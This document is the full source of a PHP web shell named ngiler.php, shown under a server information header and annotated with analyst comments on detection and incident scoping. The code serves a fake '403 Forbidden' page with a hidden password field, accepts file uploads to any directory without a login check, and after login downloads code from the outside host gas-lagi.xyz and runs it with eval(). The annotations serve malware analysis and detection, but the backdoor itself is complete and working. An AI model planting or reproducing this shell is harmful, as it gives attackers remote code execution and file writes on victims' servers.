Server: LiteSpeed
System: Linux d8 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
User: wbwebdes (3015)
PHP: 8.1.31
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
File: /home/wbwebdes/domains/abuse.wb-webdesign.com/public_html/ngiler.php
<?php

// Open (or resume) the PHP session. The rest of this script keeps its
// "authenticated" marker in the session under the key 'X-H0UR'.
session_start();

// Report whether the current session carries the login marker.
// Only the presence of $_SESSION['X-H0UR'] is tested; its value is never
// inspected. The key name is a fixed string in this file, which makes it a
// usable content signature when scanning a web root for copies of this script.
function is_logged_in() {
    return isset($_SESSION['X-H0UR']);
}

// Validate a submitted password and, on success, mark the session as logged in.
// $password: the raw value taken from the POST body by the caller.
// Returns true when md5($password) equals the embedded digest, false otherwise.
// Analyst notes: the digest is an unsalted MD5 literal, so it is identical in
// every copy of this file and can serve as a string indicator for the sample.
function login($password) {
    $valid_password_hash = 'e31fb8f677e6ccbe2bdeac06e4fc42f7'; // hard-coded MD5 digest the submitted password must match
    $password_hash = md5($password);
    if ($password_hash === $valid_password_hash) {
        // Session marker later checked by is_logged_in(); the value 'user' is not read anywhere in this file.
        $_SESSION['X-H0UR'] = 'user';
        return true;
    } else {
        return false;
    }
}

// Clear the login marker from the session.
// NOTE(review): nothing in the visible script calls this function; it is
// presumably meant for the remotely loaded code - unverified from this file.
function logout() {
    unset($_SESSION['X-H0UR']);
}

// Fetch the body of a URL, first with cURL and then with file_get_contents()
// as a fallback.
// $url: address to retrieve (the only caller in this file passes a hard-coded URL).
// Returns the response body as a string, or false if both attempts fail.
// Analyst notes: this is the script's outbound network path. Egress filtering
// and proxy/DNS logs for the web-server user are where this activity shows up.
function getContent($url) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    // Return the body from curl_exec() instead of printing it.
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    // Certificate verification is switched off, so the origin of whatever is
    // downloaded is not authenticated by TLS.
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    // Redirects are followed, so the final host may differ from the one in $url.
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
    $content = curl_exec($curl);
    curl_close($curl);
    if ($content === false) {
        // Fallback when the cURL request fails; for a remote URL this path
        // depends on the allow_url_fopen setting.
        $content = file_get_contents($url);
    }
    return $content;
}

// Thin alias for getContent(): passes $url through and returns its result unchanged.
function getRawContent($url) {
    return getContent($url);
}

// Login handling: any POST that carries a 'password' field is treated as a
// login attempt.
// Analyst notes: in access logs this appears as a POST to this file followed,
// on success, by a redirect back to the same path.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
    $password = $_POST['password'];
    if (login($password)) {
        // Successful login: redirect to the script itself and stop, so the
        // next GET reaches the is_logged_in() branch further down.
        header('Location: ' . $_SERVER['PHP_SELF']);
        exit;
    } else {
        // Failed login: emit a JavaScript alert with a fixed message
        // ("Password salah!" = "Wrong password!"), then fall through to the
        // rest of the script.
        $error_message = "Password salah!";
        echo '<script>alert("' . $error_message . '");</script>';
    }
}

// Upload form: printed whenever the query string contains inc=upload.
// This branch is not guarded by is_logged_in(). The form is pre-filled with
// getcwd(), so the server's working directory path is disclosed to whoever
// requests it. Requests with this query parameter are a useful log search term.
if (isset($_GET['inc']) && $_GET['inc'] === 'upload') {
    echo '<form method="post" enctype="multipart/form-data">';
    echo '<input type="text" name="dir" size="30" value="' . getcwd() . '">';
    echo '<input type="file" name="file" size="15">';
    echo '<input type="submit" value="Unggah">';
    echo '</form>';
}

// Upload handler: runs for every request that includes a 'file' upload part.
// It sits before the is_logged_in() branch and performs no login check of its
// own. The destination directory and the file name are both taken from the
// request without validation. For incident scoping, every file writable by the
// web-server user since this script appeared should therefore be treated as
// suspect, and multipart POSTs to this path should be reviewed in access logs.
if (isset($_FILES['file']['tmp_name'])) {
    $uploadd = $_FILES['file']['tmp_name'];
    if (file_exists($uploadd)) {
        // Target directory comes straight from the POST body.
        $pwddir = $_POST['dir'];
        // Client-supplied original file name, used as-is.
        $real = $_FILES['file']['name'];
        $de = rtrim($pwddir, '/') . "/" . $real;
        if (move_uploaded_file($uploadd, $de)) {
            // "BERKAS DIUNGGAHKAN KE" = "file uploaded to"
            echo "BERKAS DIUNGGAHKAN KE $de";
        } else {
            // "GAGAL MENGUNGGAH BERKAS KE" = "failed to upload file to"
            echo "GAGAL MENGUNGGAH BERKAS KE $de";
        }
    }
}

// Second-stage loader: once the session is marked as logged in, download the
// content at the hard-coded URL and run it through eval() on every request.
// Analyst notes:
//  - The executed code is never written to disk by this script, so file
//    scanning of the host will not reveal what actually ran. Outbound
//    connection, proxy and DNS logs for the host named below are the evidence.
//  - Behaviour is decided by whoever controls that remote file at request time.
//  - eval is a language construct, so the disable_functions list shown in the
//    page header does not restrict it; the cURL functions are not on that
//    list either. Blocking outbound connections from the PHP process is the
//    control that breaks this stage.
if (is_logged_in()) {
    $url = 'https://gas-lagi.xyz/jancok/index.txt';
    $content = getRawContent($url);
    // The closing-tag prefix makes eval() treat the download as a mixed
    // HTML/PHP template rather than as bare PHP statements.
    eval('?>' . $content);
    exit;
}

// Decoy page shown to anyone who is not logged in: static HTML imitating a web
// server's "403 Forbidden" error. Analyst notes:
//  - No call in this script sets a 403 status code, so unless the server is
//    configured otherwise the response is presumably sent as HTTP 200. A body
//    titled "403 Forbidden" delivered with a 200 status is a detection signal.
//  - The form at the bottom is the real login prompt: a password field with an
//    empty placeholder, white background and white border, pinned to the bottom
//    centre, so it blends into a default white page.
//  - REQUEST_URI, SERVER_SOFTWARE, SERVER_NAME and SERVER_PORT are echoed into
//    the page without HTML escaping.
?>

<!DOCTYPE html>
<html>
<head>
    <title>403 Forbidden</title>
</head>
<body>
    <h1>Forbidden</h1>
    <p>You don't have permission to access <?php echo $_SERVER['REQUEST_URI']; ?> on this server.</p>
    <hr>
    <address>
        <?php echo $_SERVER['SERVER_SOFTWARE']; ?> Server at <?php echo $_SERVER['SERVER_NAME']; ?> Port <?php echo $_SERVER['SERVER_PORT']; ?>
    </address>
    <form method="post">
        <input style="position: absolute; bottom: 0; left: 50%; transform: translateX(-50%); background-color: #fff; border: 1px solid #fff; text-align: center;" type="password" name="password" placeholder="">
    </form>
</body>
</html>